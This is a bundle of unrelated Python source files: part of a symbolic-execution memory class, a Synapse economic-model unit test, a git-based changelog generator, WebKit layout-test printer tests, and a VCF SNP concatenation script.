:returns: An expression representing the address of the matching byte.
"""
addr = _raw_ast(addr)
what = _raw_ast(what)
default = _raw_ast(default)
if isinstance(what, str):
# Convert it to a BVV
what = claripy.BVV(what, len(what) * 8)
r,c,m = self._find(addr, what, max_search=max_search, max_symbolic_bytes=max_symbolic_bytes, default=default,
step=step)
if o.AST_DEPS in self.state.options and self.category == 'reg':
r = SimActionObject(r, reg_deps=frozenset((addr,)))
return r,c,m
def _find(self, addr, what, max_search=None, max_symbolic_bytes=None, default=None, step=1):
raise NotImplementedError()
def copy_contents(self, dst, src, size, condition=None, src_memory=None, dst_memory=None):
"""
Copies data within a memory.
:param dst: A claripy expression representing the address of the destination
:param src: A claripy expression representing the address of the source
The following parameters are optional.
:param src_memory: Copy data from this SimMemory instead of self
:param src_memory: Copy data to this SimMemory instead of self
:param size: A claripy expression representing the size of the copy
:param condition: A claripy expression representing a condition, if the write should be conditional. If this
is determined to be false, the size of the copy will be 0.
"""
dst = _raw_ast(dst)
src = _raw_ast(src)
size = _raw_ast(size)
condition = _raw_ast(condition)
return self._copy_contents(dst, src, size, condition=condition, src_memory=src_memory, dst_memory=dst_memory)
def _copy_contents(self, dst, src, size, condition=None, src_memory=None, dst_memory=None):
raise NotImplementedError()
from bintrees import AVLTree
from .. import s_options as o
from ..s_action import SimActionData
from ..s_action_object import SimActionObject, _raw_ast
from ..s_errors import SimMemoryError, SimRegionMapError
from ..plugins.inspect import BP_BEFORE, BP_AFTER
|
|
import synapse.exc as s_exc
import synapse.tests.utils as s_utils
import synapse.common as s_common
class EconTest(s_utils.SynTest):
async def test_model_econ(self):
async with self.getTestCore() as core:
# test card number 4024007150779444
card = (await core.nodes('[ econ:pay:card="*" :expr=201802 :name="Bob Smith" :cvv=123 :pin=1234 :pan=4024007150779444 ]'))[0]
self.eq('bob smith', card.get('name'))
self.eq(1517443200000, card.get('expr'))
self.eq('4024007150779444', card.get('pan'))
self.eq(4, card.get('pan:mii'))
self.eq(402400, card.get('pan:iin'))
place = s_common.guid()
bycont = s_common.guid()
fromcont = s_common.guid()
text = f'''[
econ:purchase="*"
:price=13.37
:currency=USD
:by:contact={bycont}
:from:contact={fromcont}
:time=20180202
:place={place}
:paid=true
:paid:time=20180202
:settled=20180205
]'''
perc = (await core.nodes(text))[0]
self.eq('13.37', perc.get('price'))
self.eq('usd', perc.get('currency'))
self.len(1, await core.nodes('econ:purchase:price=13.37'))
self.len(1, await core.nodes('econ:purchase:price=13.370'))
self.len(0, await core.nodes('econ:purchase:price=13.372'))
with self.raises(s_exc.BadTypeValu):
await core.nodes('econ:purchase [ :price=730750818665451459101843 ]')
with self.raises(s_exc.BadTypeValu):
await core.nodes('econ:purchase [ :price=-730750818665451459101843 ]')
self.len(1, await core.nodes('econ:purchase:price*range=(13,14)'))
self.len(1, await core.nodes('econ:purchase:price>10.00'))
self.len(1, await core.nodes('econ:purchase:price<20.00'))
self.len(1, await core.nodes('econ:purchase:price>=10.00'))
self.len(1, await core.nodes('econ:purchase:price>=13.37'))
self.len(1, await core.nodes('econ:purchase:price<=20.00'))
self.len(1, await core.nodes('econ:purchase:price<=13.37'))
self.len(0, await core.nodes('econ:purchase:price<10.00'))
self.len(0, await core.nodes('econ:purchase:price>20.00'))
self.len(0, await core.nodes('econ:purchase:price>=20.00'))
self.len(0, await core.nodes('econ:purchase:price<=10.00'))
# runtime filter/cmpr test for econ:price
self.len(1, await core.nodes('econ:purchase:price +:price=13.37'))
self.len(1, await core.nodes('econ:purchase:price +:price=13.370'))
self.len(0, await core.nodes('econ:purchase:price +:price=13.372'))
self.len(1, await core.nodes('econ:purchase:price +:price*range=(13,14)'))
self.len(1, await core.nodes('econ:purchase:price +:price>10.00'))
self.len(1, await core.nodes('econ:purchase:price +:price<20.00'))
self.len(1, await core.nodes('econ:purchase:price +:price>=10.00'))
self.len(1, await core.nodes('econ:purchase:price +:price>=13.37'))
self.len(1, await core.nodes('econ:purchase:price +:price<=20.00'))
self.len(1, await core.nodes('econ:purchase:price +:price<=13.37'))
self.len(0, await core.nodes('econ:purchase:price +:price<10.00'))
self.len(0, await core.nodes('econ:purchase:price +:price>20.00'))
self.len(0, await core.nodes('econ:purchase:price +:price>=20.00'))
self.len(0, await core.nodes('econ:purchase:price +:price<=10.00'))
self.eq(bycont, perc.get('by:contact'))
self.eq(fromcont, perc.get('from:contact'))
self.eq(True, perc.get('paid'))
self.eq(1517529600000, perc.get('paid:time'))
self.eq(1517788800000, perc.get('settled'))
self.eq(1517529600000, perc.get('time'))
self.eq(place, perc.get('place'))
self.len(1, await core.nodes('econ:purchase -> geo:place'))
self.len(2, await core.nodes('econ:purchase -> ps:contact | uniq'))
acqu = (await core.nodes(f'[ econ:acquired=({perc.ndef[1]}, (inet:fqdn,vertex.link)) ]'))[0]
self.eq(perc.ndef[1], acqu.get('purchase'))
self.len(1, await core.nodes('econ:acquired:item:form=inet:fqdn'))
self.len(1, await core.nodes('inet:fqdn=vertex.link'))
self.eq(('inet:fqdn', 'vertex.link'), acqu.get('item'))
text = f'''[
econ:acct:payment="*"
:to:contact={bycont}
:to:coinaddr=(btc, 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2)
:from:contact={fromcont}
:from:coinaddr=(btc, 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2)
:from:pay:card={card.ndef[1]}
:amount = 20.30
:currency = usd
:time=20180202
:purchase={perc.ndef[1]}
]'''
await core.nodes(text)
self.len(1, await core.nodes('econ:acct:payment +:time@=(2017,2019) +{-> econ:pay:card +:name="bob smith"}'))
self.len(1, await core.nodes('econ:acct:payment -> econ:purchase'))
self.len(1, await core.nodes('econ:acct:payment -> econ:pay:card'))
self.len(2, await core.nodes('econ:acct:payment -> ps:contact | uniq'))
nodes = await core.nodes('''
[ econ:fin:exchange=(us,nasdaq) :name=nasdaq :currency=usd :org=* ]
''')
self.len(1, nodes)
self.nn(nodes[0].ndef[1])
self.nn(nodes[0].get('org'))
self.eq('usd', nodes[0].get('currency'))
self.eq('nasdaq', nodes[0].get('name'))
nodes = await core.nodes('''
[
econ:fin:security=(us, nasdaq, tsla)
:exchange=(us, nasdaq)
:ticker=nasdaq/tsla
:type=STOCK
:price=9999.00
:time=202002
]
''')
self.len(1, nodes)
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].ndef[1])
self.eq('stock', nodes[0].get('type'))
self.eq('nasdaq/tsla', nodes[0].get('ticker'))
self.eq('9999', nodes[0].get('price'))
self.eq(1580515200000, nodes[0].get('time'))
self.len(1, await core.nodes('econ:fin:security -> econ:fin:exchange +:name=nasdaq'))
nodes = await core.nodes('''
[
econ:fin:tick=*
:time=20200202
:security=(us, nasdaq, tsla)
:price=9999.00
]
''')
self.len(1, nodes)
self.eq(1580601600000, nodes[0].get('time'))
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].get('security'))
self.eq('9999', nodes[0].get('price'))
nodes = await core.nodes('''
[
econ:fin:bar=*
:ival=(20200202, 20200203)
:security=(us, nasdaq, tsla)
:price:open=9999.00
:price:close=9999.01
:price:high=999999999999.00
:price:low=0.00001
]
''')
self.len(1, nodes)
self.eq((1580601600000, 1580688000000), nodes[0].get('ival'))
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].get('security'))
self.eq('9999', nodes[0].get('price:open'))
self.eq('9999.01', nodes[0].get('price:close'))
self.eq('999999999999', nodes[0].get('price:high'))
self.eq('0.00001', nodes[0].get('price:low'))
nodes = await core.nodes('[ econ:acct:payment=* :from:contract=* :to:contract=* :memo="2012 Chateauneuf du Pape" ]')
self.len(1, nodes)
self.eq('2012 Chateauneuf du Pape', nodes[0].get('memo'))
self.nn(nodes[0].get('to:contract'))
self.nn(nodes[0].get('from:contract'))
nodes = await core.nodes('econ:acct:payment :to:contract -> ou:contract')
self.len(1, nodes)
nodes = await core.nodes('econ:acct:payment :from:contract -> ou:contract')
self.len(1, nodes)
nodes = await core.nodes('''
[ econ:acct:balance=*
:time = 20211031
:pay:card = *
:crypto:address = btc/12345
:amount = 123.45
:currency = usd
:delta = 12.00
]''')
self.len(1, nodes)
self.nn(nodes[0].get('pay:card'))
self.eq(nodes[0].get('time'), 1635638400000)
self.eq(nodes[0].get('crypto:address'), ('btc', '12345'))
self.eq(nodes[0].get('amount'), '123.45')
self.eq(nodes[0].get('currency'), 'usd')
self.eq(nodes[0].get('delta'), '12')
|
|
#! /usr/bin/env python
from __future__ import print_function
import os
import re
import subprocess
import sys
from collections import OrderedDict, defaultdict
from pkg_resources import parse_version
import click
import jinja2
import m2r
__version__ = "0.1.1"
CHANGELOG = """
# Change Log
All notable changes to landlab will be documented in this file.
The format is based on [Keep a Changelog](http://keepachangelog.com/)
and this project adheres to [Semantic Versioning](http://semver.org/).
This file was auto-generated using `scripts/make_changelog.py`.
{% for tag, sections in releases.items() %}
## Version {{ tag }}
*(released on {{ release_date[tag] }})*
{% for section, changes in sections.items() %}
### {{section}}
{% for change in changes -%}
* {{ change }}
{% endfor -%}
{% endfor -%}
{% endfor -%}
""".strip()
SECTIONS = ["Added", "Changed", "Deprecated", "Removed", "Fixed", "Security"]
def git_log(start=None, stop="HEAD"):
cmd = [
"git",
"log",
"--first-parent",
"master",
"--merges",
"--topo-order",
# '--pretty=message: %s+author:%an+body: %b'],
# "--pretty=%s [%an]",
"--pretty=%s",
# '--oneline',
]
if start:
cmd.append("{start}..{stop}".format(start=start, stop=stop))
return subprocess.check_output(cmd).strip().decode("utf-8")
def git_tag():
return subprocess.check_output(["git", "tag"]).strip().decode("utf-8")
def git_tag_date(tag):
return (
subprocess.check_output(["git", "show", tag, "--pretty=%ci"])
.strip()
.split()[0]
.decode("utf-8")
)
def git_top_level():
return (
subprocess.check_output(["git", "rev-parse", "--show-toplevel"])
.strip()
.decode("utf-8")
)
def releases(ascending=True):
tags = git_tag().splitlines() + ["HEAD"]
if ascending:
return tags
else:
return tags[::-1]
def format_pr_message(message):
m = re.match(
"Merge pull request (?P<pr>#[0-9]+) "
"from (?P<branch>[\S]*)"
"(?P<postscript>[\s\S]*$)",
message,
)
if m:
return "{branch} [{pr}]{postscript}".format(**m.groupdict())
else:
raise ValueError("not a pull request")
def format_changelog_message(message):
m = re.match("(?P<first>\w+)(?P<rest>[\s\S]*)$", message)
word = m.groupdict()["first"]
if word in ("Add", "Fix", "Deprecate"):
return word + "ed" + m.groupdict()["rest"]
elif word in ("Change", "Remove"):
return word + "d" + m.groupdict()["rest"]
else:
return message
def prettify_message(message):
if message.startswith("Merge branch"):
return None
try:
message = format_pr_message(message)
except ValueError:
message = format_changelog_message(message)
return message
def brief(start=None, stop="HEAD"):
changes = []
for change in git_log(start=start, stop=stop).splitlines():
if change:
message = prettify_message(change)
if message:
changes.append(message)
return changes
def group_changes(changes):
groups = defaultdict(list)
for change in changes:
if change.startswith("Add"):
group = "Added"
elif change.startswith("Deprecate"):
group = "Deprecated"
elif change.startswith("Remove"):
group = "Removed"
elif change.startswith("Fix"):
group = "Fixed"
elif change.startswith("Security"):
group = "Security"
else:
group = "Changed"
groups[group].append(change)
return groups
def render_changelog(format="rst"):
tags = releases(ascending=False)
changes_by_version = defaultdict(list)
release_date = dict()
for start, stop in zip(tags[1:], tags[:-1]):
if stop.startswith("v"):
version = ".".join(parse_version(stop[1:]).base_version.split(".")[:2])
else:
version = stop
changes_by_version[version] += brief(start=start, stop=stop)
release_date[version] = git_tag_date(stop)
changelog = OrderedDict()
for version, changes in changes_by_version.items():
changelog[version] = group_changes(changes)
env = jinja2.Environment(loader=jinja2.DictLoader({"changelog": CHANGELOG}))
contents = env.get_template("changelog").render(
releases=changelog, release_date=release_date
)
if format == "rst":
contents = m2r.convert(contents)
return contents
@click.command()
@click.argument("output", type=click.File("w"), default="-")
@click.option(
"-q",
"--quiet",
is_flag=True,
help=(
"Don't emit non-error messages to stderr. Errors are still emitted, "
"silence those with 2>/dev/null."
),
)
@click.option(
"-v",
"--verbose",
is_flag=True,
help=(
"Also emit messages to stderr about files that were not changed or were "
"ignored due to --exclude=."
),
)
@click.option(
"-f",
"--force",
is_flag=True,
help="Overwrite an existing change log without prompting.",
)
@click.version_option(version=__version__)
@click.option(
"--format",
type=click.Choice(["md", "rst"]),
default="rst",
help="Format to use for the CHANGELOG.",
)
@click.option(
"--batch",
is_flag=True,
help="Run in batch mode.",
)
def main(output, quiet, verbose, format, force, batch):
contents = render_changelog(format=format)
if not batch:
click.echo_via_pager(contents)
path_to_changelog = os.path.join(git_top_level(), "CHANGELOG." + format)
if os.path.isfile(path_to_changelog) and not force:
click.secho(
"{0} exists. Use --force to overwrite".format(path_to_changelog),
fg="red",
err=True,
)
sys.exit(1)
with open(path_to_changelog, "w") as fp:
fp.write(contents)
click.secho("Fresh change log at {0}".format(path_to_changelog), bold=True, err=True)
if __name__ == "__main__":
main(auto_envvar_prefix="CHANGELOG")
|
|
# Copyright (C) 2010, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for printing.py."""
import StringIO
import optparse
import sys
import time
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system import logtesting
from webkitpy.layout_tests import port
from webkitpy.layout_tests.controllers import manager
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.models import test_failures
from webkitpy.layout_tests.models import test_results
from webkitpy.layout_tests.views import printing
def get_options(args):
print_options = printing.print_options()
option_parser = optparse.OptionParser(option_list=print_options)
return option_parser.parse_args(args)
class TestUtilityFunctions(unittest.TestCase):
def test_print_options(self):
options, args = get_options([])
self.assertIsNotNone(options)
class FakeRunResults(object):
def __init__(self, total=1, expected=1, unexpected=0, fake_results=None):
fake_results = fake_results or []
self.total = total
self.expected = expected
self.expected_failures = 0
self.unexpected = unexpected
self.expected_skips = 0
self.results_by_name = {}
total_run_time = 0
for result in fake_results:
self.results_by_name[result.shard_name] = result
total_run_time += result.total_run_time
self.run_time = total_run_time + 1
class FakeShard(object):
def __init__(self, shard_name, total_run_time):
self.shard_name = shard_name
self.total_run_time = total_run_time
class Testprinter(unittest.TestCase):
def assertEmpty(self, stream):
self.assertFalse(stream.getvalue())
def assertNotEmpty(self, stream):
self.assertTrue(stream.getvalue())
def assertWritten(self, stream, contents):
self.assertEqual(stream.buflist, contents)
def reset(self, stream):
stream.buflist = []
stream.buf = ''
def get_printer(self, args=None):
args = args or []
printing_options = printing.print_options()
option_parser = optparse.OptionParser(option_list=printing_options)
options, args = option_parser.parse_args(args)
host = MockHost()
self._port = host.port_factory.get('test', options)
nproc = 2
regular_output = StringIO.StringIO()
printer = printing.Printer(self._port, options, regular_output)
return printer, regular_output
def get_result(self, test_name, result_type=test_expectations.PASS, run_time=0):
failures = []
if result_type == test_expectations.TIMEOUT:
failures = [test_failures.FailureTimeout()]
elif result_type == test_expectations.CRASH:
failures = [test_failures.FailureCrash()]
return test_results.TestResult(test_name, failures=failures, test_run_time=run_time)
def test_configure_and_cleanup(self):
# This test verifies that calling cleanup repeatedly and deleting
# the object is safe.
printer, err = self.get_printer()
printer.cleanup()
printer.cleanup()
printer = None
def test_print_config(self):
printer, err = self.get_printer()
# FIXME: it's lame that i have to set these options directly.
printer._options.pixel_tests = True
printer._options.new_baseline = True
printer._options.time_out_ms = 6000
printer._options.slow_time_out_ms = 12000
printer.print_config('/tmp')
self.assertIn("Using port 'test-mac-mac10.10'", err.getvalue())
self.assertIn('Test configuration: <mac10.10, x86, release>', err.getvalue())
self.assertIn('View the test results at file:///tmp', err.getvalue())
self.assertIn('View the archived results dashboard at file:///tmp', err.getvalue())
self.assertIn('Baseline search path: test-mac-mac10.10 -> test-mac-mac10.11 -> generic', err.getvalue())
self.assertIn('Using Release build', err.getvalue())
self.assertIn('Pixel tests enabled', err.getvalue())
self.assertIn('Command line:', err.getvalue())
self.assertIn('Regular timeout: ', err.getvalue())
self.reset(err)
printer._options.quiet = True
printer.print_config('/tmp')
self.assertNotIn('Baseline search path: test-mac-mac10.10 -> test-mac-mac10.11 -> generic', err.getvalue())
def test_print_directory_timings(self):
printer, err = self.get_printer()
printer._options.debug_rwt_logging = True
run_results = FakeRunResults()
run_results.results_by_name = {
"slowShard": FakeShard("slowShard", 16),
"borderlineShard": FakeShard("borderlineShard", 15),
"fastShard": FakeShard("fastShard", 1),
}
printer._print_directory_timings(run_results)
self.assertWritten(err, ['Time to process slowest subdirectories:\n', ' slowShard took 16.0 seconds to run 1 tests.\n', '\n'])
printer, err = self.get_printer()
printer._options.debug_rwt_logging = True
run_results.results_by_name = {
"borderlineShard": FakeShard("borderlineShard", 15),
"fastShard": FakeShard("fastShard", 1),
}
printer._print_directory_timings(run_results)
self.assertWritten(err, [])
def test_print_one_line_summary(self):
def run_test(total, exp, unexp, shards, result):
printer, err = self.get_printer(['--timing'] if shards else None)
fake_results = FakeRunResults(total, exp, unexp, shards)
total_time = fake_results.run_time + 1
printer._print_one_line_summary(total_time, fake_results)
self.assertWritten(err, result)
# Without times:
run_test(1, 1, 0, [], ["The test ran as expected.\n", "\n"])
run_test(2, 1, 1, [], ["\n", "1 test ran as expected, 1 didn't:\n", "\n"])
run_test(3, 2, 1, [], ["\n", "2 tests ran as expected, 1 didn't:\n", "\n"])
run_test(3, 2, 0, [], ["\n", "2 tests ran as expected (1 didn't run).\n", "\n"])
# With times:
fake_shards = [FakeShard("foo", 1), FakeShard("bar", 2)]
run_test(1, 1, 0, fake_shards, ["The test ran as expected in 5.00s (2.00s in rwt, 1x).\n", "\n"])
run_test(2, 1, 1, fake_shards, ["\n", "1 test ran as expected, 1 didn't in 5.00s (2.00s in rwt, 1x):\n", "\n"])
run_test(3, 2, 1, fake_shards, ["\n", "2 tests ran as expected, 1 didn't in 5.00s (2.00s in rwt, 1x):\n", "\n"])
run_test(3, 2, 0, fake_shards, ["\n", "2 tests ran as expected (1 didn't run) in 5.00s (2.00s in rwt, 1x).\n", "\n"])
def test_test_status_line(self):
printer, _ = self.get_printer()
printer._meter.number_of_columns = lambda: 80
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(80, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associa...after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: 89
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(89, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associated-...ents-after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: sys.maxint
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(90, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: 18
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(18, len(actual))
self.assertEqual(actual, '[0/0] f...l passed')
printer._meter.number_of_columns = lambda: 10
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(actual, '[0/0] associated-elements-after-index-assertion-fail1.html passed')
def test_details(self):
printer, err = self.get_printer(['--details'])
result = self.get_result('passes/image.html')
printer.print_started_test('passes/image.html')
printer.print_finished_test(result, expected=False, exp_str='', got_str='')
self.assertNotEmpty(err)
def test_print_found(self):
printer, err = self.get_printer()
printer.print_found(100, 10, 1, 1)
self.assertWritten(err, ["Found 100 tests; running 10, skipping 90.\n"])
self.reset(err)
printer.print_found(100, 10, 2, 3)
self.assertWritten(err, ["Found 100 tests; running 10 (6 times each: --repeat-each=2 --iterations=3), skipping 90.\n"])
def test_debug_rwt_logging_is_throttled(self):
printer, err = self.get_printer(['--debug-rwt-logging'])
result = self.get_result('passes/image.html')
printer.print_started_test('passes/image.html')
printer.print_finished_test(result, expected=True, exp_str='', got_str='')
printer.print_started_test('passes/text.html')
result = self.get_result('passes/text.html')
printer.print_finished_test(result, expected=True, exp_str='', got_str='')
# Only the first test's start should be printed.
lines = err.buflist
self.assertEqual(len(lines), 1)
self.assertTrue(lines[0].endswith('passes/image.html\n'))
|
|
#!/usr/bin/python
"""
Concatenates all SNPs from a VCF file in either FASTA or aln (clustal) format
"""
import os, sys
import copy
import argparse
import multiprocessing
from pprint import pprint as pp
from collections import defaultdict, Counter
sys.path.insert(0, '.')
import vcfmerger
import editdist
from treemanager import fixsppname
#GZ=SL2.40ch06g50000_000100001_000150000.vcf.gz.raw.vcf.gz; FA=$GZ.SL2.40ch06.fasta; ../vcfconcat.py -f -RIL -Rg -Rd -i $GZ; ../FastTreeMP -fastest -gamma -nt -bionj -boot 100 -log $FA.log -out $FA.tree $FA; ../FastTreeMP -nt -makematrix $FA > $FA.matrix; ./newick_to_png.py --infile $FA.tree
#FA=SL2.40ch06g50000_000100001_000150000.vcf.gz.SL2.40ch06.fasta; ../FastTreeMP -fastest -gamma -nt -bionj -boot 100 -log $FA.log -out $FA.tree $FA; ../FastTreeMP -nt -makematrix $FA > $FA.matrix; ./newick_to_png.py --infile $FA.tree
def main(args):
methods = {
'median' : grouper_median,
'linkage': grouper_linkage
}
dflmethod = methods.keys()[0]
parser = argparse.ArgumentParser(description='Concatenate SNPs as a single sequence for each species.')
parser.add_argument('-c', '--chrom' , '--chromosome', dest='chromosome' , default=None , action='store' , nargs='?', type=str , help='Chromosome to filter [all]')
parser.add_argument('-I', '--ignore', '--skip' , dest='ignore' , default=[] , action='append' , nargs='*', type=str , help='Chromosomes to skip')
parser.add_argument('-s', '--start' , dest='start' , default=None , action='store' , nargs='?', type=int , help='Chromosome start position to filter [0]')
parser.add_argument('-e', '--end' , dest='end' , default=None , action='store' , nargs='?', type=int , help='Chromosome end position to filter [-1]')
parser.add_argument('-t', '--threads' , dest='threads' , default=0 , action='store' , nargs='?', type=int , help='Number of threads [num chromosomes]')
parser.add_argument('-a', '--clustal' , dest='fasta' , action='store_false', help='Output in clustal .aln format [default: fasta format]')
parser.add_argument('-r', '--noref' , dest='noref' , action='store_false', help='Do not print reference [default: true]')
parser.add_argument('-n', '--ref-name' , dest='refname' , default='ref' , action='store' , nargs='?', type=str , help='Reference name [default: ref]')
parser.add_argument('-R', '--RIL' , dest='RIL' , action='store_true' , help='RIL mode: false]')
parser.add_argument('-Rm','--RIL-mads' , dest='RILmads' , default=0.25 , action='store' , nargs='?', type=float, help='RIL percentage of Median Absolute Deviation to use (smaller = more restrictive): 0.25]')
parser.add_argument('-Rs','--RIL-minsim' , dest='RILminsim' , default=0.75 , action='store' , nargs='?', type=float, help='RIL percentage of nucleotides identical to reference to classify as reference: 0.75]')
parser.add_argument('-Rg','--RIL-greedy' , dest='RILgreedy' , action='store_true' , help='RIL greedy convert nucleotides to either the reference sequence or the alternative sequence: false]')
parser.add_argument('-Rd','--RIL-delete' , dest='RILdelete' , action='store_true' , help='RIL delete invalid sequences: false]')
parser.add_argument('-M' ,'--RIL-method' , dest='groupMethod', default=dflmethod, action='store' , nargs='?', choices=methods.keys(), type=str , help='Clustering method for RIL selection of good and bad sequences [' + ','.join(methods.keys()) + ']')
parser.add_argument('-i' , '--input' , dest='input' , default=None , nargs='?', type=str , help='Input file')
#parser.add_argument('input' , default=None , action='store' , nargs='?', metavar='input file', type=str , help='Input file')
options = parser.parse_args(args)
print options
indexFile = None
parallel = False
config = {
'format' : 'fasta',
'ignore' : [],
'inchr' : None,
'inend' : None,
'infhd' : None,
'infile' : None,
'instart' : None,
'noref' : True,
'refname' : None,
'ouchr' : None,
'oufhd' : None,
'RIL' : False,
'RILmads' : 0.25,
'RILminsim' : 0.75,
'RILgreedy' : False,
'RILdelete' : False,
'sppmaxlength' : None,
'threads' : None,
}
config['infile' ] = options.input
config['ignore' ] = options.ignore
config['inchr' ] = options.chromosome
config['inend' ] = options.end
config['instart' ] = options.start
config['noref' ] = options.noref
config['refname' ] = options.refname
config['threads' ] = options.threads
config['RIL' ] = options.RIL
config['RILmads' ] = options.RILmads
config['RILminsim' ] = options.RILminsim
config['RILgreedy' ] = options.RILgreedy
config['RILdelete' ] = options.RILdelete
config['groupMethod'] = options.groupMethod
if config['groupMethod'] not in methods:
print "%s not a valid method" % config['groupMethod']
sys.exit(1)
config[ 'grouper' ] = methods[ config['groupMethod'] ]
if options.input is None:
print "no input file defined"
sys.exit(1)
if not os.path.exists(options.input):
print "input file %s does not exists" % options.input
sys.exit(1)
if not options.fasta:
config['format' ] = 'aln'
if ( config['instart'] is not None ) and ( config['inend'] is not None ):
if config['inend'] <= config['instart']:
print "end position smaller than start position %d < %d" % (config['inend'] < config['instart'])
sys.exit(1)
parallel = False
if ( config['inchr'] is None ) and ( config['instart'] is None ) and ( config['inend'] is None ):
parallel = True
indexFile = config['infile'] + ".idx"
print "Input File : %s" % config['infile']
print "Index File : %s (exists: %s)" % ( indexFile, os.path.exists(indexFile) )
print "Print Reference : %s" % ( str(options.noref) )
if not os.path.exists( indexFile ):
vcfmerger.makeIndexFile( indexFile, config['infile'] )
config['idx'] = vcfmerger.readIndex(indexFile)
if config['inchr'] is not None:
if config['inchr'] not in config['idx']:
print "requested chromosome %s does not exists" % config['inchr']
sys.exit(1)
config['insekpos'] = config['idx'][config['inchr']]
readSources(config)
if parallel:
parallelize(config)
else:
readData(config)
return config
def getOptionInFile(pars, opts):
"""
Returns input file from argument
"""
infile = opts.iinput if opts.input is None else opts.iinput
if infile is None:
print "no input file given"
pars.print_help()
sys.exit(1)
if isinstance(infile, list):
if len(infile) > 1:
print "more than one file given"
print infile
pars.print_help()
sys.exit(1)
infile = infile[0]
else:
infile = infile
return infile
def parallelize(config):
"""
Runs in parallel
"""
print "parallelizing"
if config['threads' ] == 0:
config['threads' ] = len( config['idx'] )
print "num threads %d" % config['threads' ]
#config['thread' ] = 1
#sys.exit(0)
pool = multiprocessing.Pool(processes=config['threads' ])
#pool = multiprocessing.Pool(processes=1)
results = []
for chrom, pos in sorted(config['idx'].items(), key=lambda item: item[1]):
config['inchr' ] = chrom
config['insekpos'] = pos
if chrom in config['ignore' ]:
continue
print "parallelizing :: chrom %s" % chrom
results.append( [chrom, pool.apply_async( readData, [ copy.copy( config ) ] )] )
while len(results) > 0:
for info in results:
try:
#print "getting result"
chrom, res = info
res.get( 5 )
results.remove( info )
print "getting result %s. OK" % chrom
except multiprocessing.TimeoutError:
#print "getting result FAILED. waiting"
pass
def readSources(config):
"""
Read list of VCF files
"""
print "reading sources"
print "opening",
with vcfmerger.openvcffile(config['infile'], 'r') as infhd:
print "ok"
print "reading"
header = ""
sources = {}
names = None
for line in infhd:
line = line.strip()
if len(line) == 0: continue
if line[0] == '#':
header += line + "\n"
if line.startswith('##sources='):
names = line[10:].split('|')
for name in names:
sources[name] = []
#pp(sources)
elif line.startswith('##numsources='):
numsources = int(line[13:])
if numsources != len(sources):
print "error parsing sources", numsources, len(sources),sources, len(names), names
sys.exit(1)
else:
print "num sources:",numsources
continue
break
sppmaxlength = 0
for spp in sorted(sources):
sppname = fixsppname( spp )
if len(sppname) > sppmaxlength: sppmaxlength = len(sppname)
sppmaxlength += 2
sppmaxlength = "%-"+str(sppmaxlength)+"s"
config['sppmaxlength'] = sppmaxlength
config['sources' ] = sources
config['names' ] = names
config['header' ] = header
def readData(config):
"""
read data from specific VCF file
"""
print "reading data"
config['infhd'] = vcfmerger.openvcffile(config['infile'], 'r')
config['ouchr'] = None
config['oufhd'] = None
runName = "all"
if config['idx'] is not None:
print "reading data :: has idx"
if config['inchr'] is not None:
print "reading data :: has idx :: seeking chrom %s" % config['inchr']
config['infhd'].seek( config['insekpos'] )
runName = config['inchr']
print "reading data :: has idx :: seeking chrom %s. DONE" % config['inchr']
else:
print "reading data :: has idx :: error seeking"
sys.exit(1)
print "reading data :: %s" % config['inchr']
inchr = config['inchr' ]
instart = config['instart' ]
inend = config['inend' ]
config['coords' ] = set()
refs = []
lastChro = None
numSnps = -1
numSnpsVal = -1
lastPos = -1
lastPosVal = -1
finalChro = False
for line in config['infhd']:
line = line.strip()
if len(line) == 0: continue
if line[0] == '#':
continue
cols = line.split("\t")
if len(cols) != 10:
print line
sys.exit(1)
chro = cols[0]
posi = int(cols[1])
src = cols[3]
